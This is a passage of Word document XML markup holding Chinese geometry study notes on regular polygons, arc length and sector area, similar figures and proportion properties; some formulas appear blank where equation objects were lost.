        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经过各分点作圆的切线，以相邻切线的交点为顶点的多边形是这个圆的外切正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>任何正多边形都有一个外接圆和一个内切圆，这两个圆是同心圆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形的半径和边心距把正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形分成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个全等的直角三角形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形的面积</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sn=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形的周长</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">33 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>弧长和扇形面积</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>弧长计算公式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>L=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>扇形面积公式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>扇形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>圆柱侧面积</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> S=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>圆锥侧面积</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> S=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相似图形：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相似多边形：各角对应相等，各边对应成比例的两个多边形叫做相似多边形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相似多边形的性质：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>①相似多边形对应边的比等于相似比；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>②相似多边形的周长比等于相似比，面积比等于相似比的平方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相似三角形：三角对应相等，三边对应成比例的两个三角形叫做相似三角形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相似三角形的性质：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>①相似三角形对应边的比等于相似比；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>②相似三角形对应高，对应角平分线，对应中线的比都等于相似比；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>③相似三角形的周长比等于相似比，面积比等于相似比的平方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比例的基本性质</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a:b=c:d,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ad=bc  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ad=bc,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">a:b=c:d  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>合比性质</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b=c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
